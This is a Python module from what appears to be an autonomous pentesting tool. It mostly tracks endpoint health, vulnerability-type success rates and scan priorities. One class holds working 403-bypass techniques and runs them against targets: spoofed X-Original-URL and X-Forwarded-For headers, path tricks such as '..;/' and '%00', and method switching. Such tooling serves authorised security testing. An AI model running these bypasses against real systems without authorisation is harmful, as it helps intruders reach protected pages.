""" NeuroSploit v3 - Strategy Adapter Mid-scan strategy adaptation: signal tracking, 403 bypass attempts, diminishing returns detection, endpoint health monitoring, and dynamic reprioritization for autonomous pentesting. """ import asyncio import logging import time from dataclasses import dataclass, field from typing import Dict, List, Optional, Any, Callable from urllib.parse import urlparse logger = logging.getLogger(__name__) @dataclass class EndpointHealth: """Health tracking for a single endpoint.""" url: str total_tests: int = 0 consecutive_failures: int = 0 status_403_count: int = 0 status_429_count: int = 0 timeout_count: int = 0 findings_count: int = 0 is_dead: bool = False waf_detected: bool = False avg_response_time: float = 0.0 _response_times: list = field(default_factory=list) tested_types: set = field(default_factory=set) last_test_time: float = 0.0 @dataclass class VulnTypeStats: """Tracking stats per vulnerability type.""" vuln_type: str total_tests: int = 0 confirmed_count: int = 0 rejected_count: int = 0 waf_block_count: int = 0 success_rate: float = 0.0 avg_confidence: float = 0.0 _confidences: list = field(default_factory=list) class BypassTechniques: """403 Forbidden bypass with 15+ techniques.""" HEADER_BYPASSES = [ {"X-Original-URL": "{path}"}, {"X-Rewrite-URL": "{path}"}, {"X-Forwarded-For": "127.0.0.1"}, {"X-Forwarded-Host": "localhost"}, {"X-Custom-IP-Authorization": "127.0.0.1"}, {"X-Real-IP": "127.0.0.1"}, {"X-Originating-IP": "127.0.0.1"}, {"X-Remote-IP": "127.0.0.1"}, {"X-Client-IP": "127.0.0.1"}, {"X-Host": "localhost"}, ] PATH_BYPASSES = [ "{path}/.", # /admin/. "{path}/./", # /admin/./ "{path}..;/", # /admin..;/ "/{path}//", # //admin// "{path}%20", # /admin%20 "{path}%00", # /admin%00 (null byte) "{path}?", # /admin? "{path}???", # /admin??? "{path}#", # /admin# "/%2e/{path_no_slash}", # /%2e/admin "/{path_no_slash};/", # /admin;/ "/{path_no_slash}..;/", # /admin..;/ "/{path_upper}", # /ADMIN ] METHOD_BYPASSES = ["OPTIONS", "PUT", "PATCH", "TRACE", "HEAD"] @classmethod async def attempt_bypass( cls, request_engine, url: str, original_method: str = "GET", original_response: Optional[Dict] = None, ) -> Optional[Dict]: """Try bypass techniques on a 403'd URL. Returns the first successful bypass response, or None. """ parsed = urlparse(url) path = parsed.path path_no_slash = path.lstrip("/") path_upper = path.upper() base_url = f"{parsed.scheme}://{parsed.netloc}" # Phase 1: Header bypasses for header_set in cls.HEADER_BYPASSES: try: headers = {} for k, v in header_set.items(): headers[k] = v.format(path=path) result = await request_engine.request( url, method=original_method, headers=headers ) if result and result.status not in (403, 401, 0): logger.info(f"403 bypass via header {list(header_set.keys())[0]}: {url}") return { "status": result.status, "body": result.body, "headers": result.headers, "bypass_method": f"header:{list(header_set.keys())[0]}", } except Exception: continue # Phase 2: Path bypasses for path_tmpl in cls.PATH_BYPASSES: try: new_path = path_tmpl.format( path=path, path_no_slash=path_no_slash, path_upper=path_upper ) bypass_url = f"{base_url}{new_path}" if parsed.query: bypass_url += f"?{parsed.query}" result = await request_engine.request( bypass_url, method=original_method ) if result and result.status not in (403, 401, 404, 0): logger.info(f"403 bypass via path '{new_path}': {url}") return { "status": result.status, "body": result.body, "headers": result.headers, "bypass_method": f"path:{new_path}", } except Exception: continue # Phase 3: Method bypasses for method in cls.METHOD_BYPASSES: if method == original_method: continue try: result = await request_engine.request(url, method=method) if result and result.status not in (403, 401, 405, 0): logger.info(f"403 bypass via method {method}: {url}") return { "status": result.status, "body": result.body, "headers": result.headers, "bypass_method": f"method:{method}", } except Exception: continue return None class StrategyAdapter: """Mid-scan strategy adaptation engine. Monitors endpoint health, vuln type success rates, and global signals to dynamically adjust testing strategy. Features: - Dead endpoint detection (skip after N consecutive failures) - Hot endpoint promotion (more testing on productive endpoints) - 403 bypass (15+ techniques via BypassTechniques) - Diminishing returns (stop testing unproductive type+endpoint combos) - Dynamic rate limiting adjustment - Priority recomputation every N tests - Global statistics and reporting """ DEAD_ENDPOINT_THRESHOLD = 3 # Consecutive failures before marking dead DIMINISHING_RETURNS_THRESHOLD = 10 # Max failed payloads before skipping type ADAPTATION_INTERVAL = 50 # Tests between priority recomputations MAX_403_BYPASS_PER_URL = 2 # Max bypass attempts per URL HOT_ENDPOINT_THRESHOLD = 2 # Findings to mark endpoint as "hot" def __init__(self, memory=None): self.memory = memory self._endpoints: Dict[str, EndpointHealth] = {} self._vuln_stats: Dict[str, VulnTypeStats] = {} self._global_test_count = 0 self._global_finding_count = 0 self._last_adaptation_time = time.time() self._last_adaptation_count = 0 self._403_bypass_attempts: Dict[str, int] = {} # url -> attempt count self._bypass_successes: List[Dict] = [] self._hot_endpoints: set = set() self._rate_limit_detected = False self._global_delay = 0.1 def _get_endpoint(self, url: str) -> EndpointHealth: """Get or create endpoint health tracker.""" # Normalize URL (strip query params for grouping) parsed = urlparse(url) key = f"{parsed.scheme}://{parsed.netloc}{parsed.path}" if key not in self._endpoints: self._endpoints[key] = EndpointHealth(url=key) return self._endpoints[key] def _get_vuln_stats(self, vuln_type: str) -> VulnTypeStats: """Get or create vuln type stats tracker.""" if vuln_type not in self._vuln_stats: self._vuln_stats[vuln_type] = VulnTypeStats(vuln_type=vuln_type) return self._vuln_stats[vuln_type] def record_test_result( self, url: str, vuln_type: str, status: int, was_confirmed: bool, confidence: int = 0, duration: float = 0.0, error_type: str = "success", ): """Record the result of a vulnerability test. Called after each test attempt to update all tracking state. """ ep = self._get_endpoint(url) vs = self._get_vuln_stats(vuln_type) self._global_test_count += 1 # Update endpoint health ep.total_tests += 1 ep.last_test_time = time.time() ep.tested_types.add(vuln_type) if duration > 0: ep._response_times.append(duration) if len(ep._response_times) > 30: ep._response_times = ep._response_times[-20:] ep.avg_response_time = sum(ep._response_times) / len(ep._response_times) if status == 403: ep.status_403_count += 1 elif status == 429: ep.status_429_count += 1 self._rate_limit_detected = True elif error_type in ("timeout", "connection_error"): ep.timeout_count += 1 # Track consecutive failures if was_confirmed: ep.consecutive_failures = 0 ep.findings_count += 1 self._global_finding_count += 1 if ep.findings_count >= self.HOT_ENDPOINT_THRESHOLD: self._hot_endpoints.add(ep.url) elif status in (0, 403, 429) or error_type != "success": ep.consecutive_failures += 1 if ep.consecutive_failures >= self.DEAD_ENDPOINT_THRESHOLD: ep.is_dead = True logger.debug(f"Endpoint marked dead: {ep.url}") else: # Got a response but no finding -- not a consecutive failure ep.consecutive_failures = 0 # Update vuln type stats vs.total_tests += 1 if was_confirmed: vs.confirmed_count += 1 else: vs.rejected_count += 1 if status == 403 and error_type == "waf_blocked": vs.waf_block_count += 1 if confidence > 0: vs._confidences.append(confidence) if len(vs._confidences) > 50: vs._confidences = vs._confidences[-30:] vs.avg_confidence = sum(vs._confidences) / len(vs._confidences) vs.success_rate = vs.confirmed_count / vs.total_tests if vs.total_tests > 0 else 0 def should_test_endpoint(self, url: str) -> bool: """Check if an endpoint should still be tested.""" ep = self._get_endpoint(url) if ep.is_dead: return False return True def should_test_type(self, vuln_type: str, url: str) -> bool: """Check if a vuln type should be tested on an endpoint.""" ep = self._get_endpoint(url) vs = self._get_vuln_stats(vuln_type) # Skip if endpoint is dead if ep.is_dead: return False # Skip if this type has 0% success after 15+ global tests AND waf blocks if vs.total_tests >= 15 and vs.success_rate == 0 and vs.waf_block_count > 5: logger.debug(f"Skipping {vuln_type}: 0% success + WAF blocks") return False return True def should_reduce_payloads(self, vuln_type: str, tested_count: int) -> bool: """Check if we should stop testing payloads (diminishing returns).""" vs = self._get_vuln_stats(vuln_type) # Allow more payloads for types with good success rate if vs.success_rate > 0.1: return tested_count >= self.DIMINISHING_RETURNS_THRESHOLD * 2 return tested_count >= self.DIMINISHING_RETURNS_THRESHOLD def should_attempt_403_bypass(self, url: str) -> bool: """Check if we should try 403 bypass for this URL.""" ep = self._get_endpoint(url) attempts = self._403_bypass_attempts.get(ep.url, 0) return ( ep.status_403_count >= 2 and attempts < self.MAX_403_BYPASS_PER_URL ) async def try_bypass_403(self, request_engine, url: str, method: str = "GET") -> Optional[Dict]: """Attempt 403 bypass with multiple techniques.""" ep = self._get_endpoint(url) self._403_bypass_attempts[ep.url] = self._403_bypass_attempts.get(ep.url, 0) + 1 result = await BypassTechniques.attempt_bypass( request_engine, url, original_method=method ) if result: self._bypass_successes.append({ "url": url, "method": result.get("bypass_method", "unknown"), "status": result.get("status", 0), }) # Revive endpoint ep.is_dead = False ep.consecutive_failures = 0 logger.info(f"403 bypass success: {url} via {result.get('bypass_method')}") return result def get_dynamic_delay(self) -> float: """Get current recommended delay between requests.""" if self._rate_limit_detected: return max(self._global_delay, 1.0) return self._global_delay def should_recompute_priorities(self) -> bool: """Check if it's time to recompute testing priorities.""" tests_since = self._global_test_count - self._last_adaptation_count time_since = time.time() - self._last_adaptation_time return tests_since >= self.ADAPTATION_INTERVAL or time_since >= 120 def recompute_priorities(self, vuln_types: List[str]) -> List[str]: """Recompute vuln type priority order based on observed results. Promotes types with high success rates and deprioritizes failed types. Returns reordered list of vuln types. """ self._last_adaptation_count = self._global_test_count self._last_adaptation_time = time.time() def type_score(vt): vs = self._get_vuln_stats(vt) if vs.total_tests == 0: return 0.5 # Untested -- medium priority # Weighted: success rate + bonus for confirmed findings score = vs.success_rate * 0.6 if vs.confirmed_count > 0: score += 0.3 # Penalty for WAF blocks if vs.waf_block_count > vs.total_tests * 0.5: score -= 0.2 return score scored = [(vt, type_score(vt)) for vt in vuln_types] scored.sort(key=lambda x: x[1], reverse=True) reordered = [vt for vt, _ in scored] logger.debug(f"Priority recomputed: {reordered[:5]}") return reordered def get_hot_endpoints(self) -> List[str]: """Get endpoints that have yielded multiple findings.""" return list(self._hot_endpoints) def get_report_context(self) -> Dict: """Get strategy stats for report generation.""" dead_count = sum(1 for e in self._endpoints.values() if e.is_dead) hot_count = len(self._hot_endpoints) top_types = sorted( self._vuln_stats.values(), key=lambda v: v.confirmed_count, reverse=True, )[:5] return { "total_tests": self._global_test_count, "total_findings": self._global_finding_count, "endpoints_tested": len(self._endpoints), "endpoints_dead": dead_count, "endpoints_hot": hot_count, "rate_limiting_detected": self._rate_limit_detected, "bypass_successes": len(self._bypass_successes), "bypass_details": self._bypass_successes[:10], "top_vuln_types": [ { "type": v.vuln_type, "tests": v.total_tests, "confirmed": v.confirmed_count, "rate": f"{v.success_rate:.1%}", } for v in top_types ], "hot_endpoints": list(self._hot_endpoints)[:10], } def get_endpoint_summary(self) -> Dict[str, Dict]: """Get summary of all tracked endpoints.""" return { url: { "tests": ep.total_tests, "findings": ep.findings_count, "dead": ep.is_dead, "403s": ep.status_403_count, "avg_response": round(ep.avg_response_time, 3), } for url, ep in self._endpoints.items() }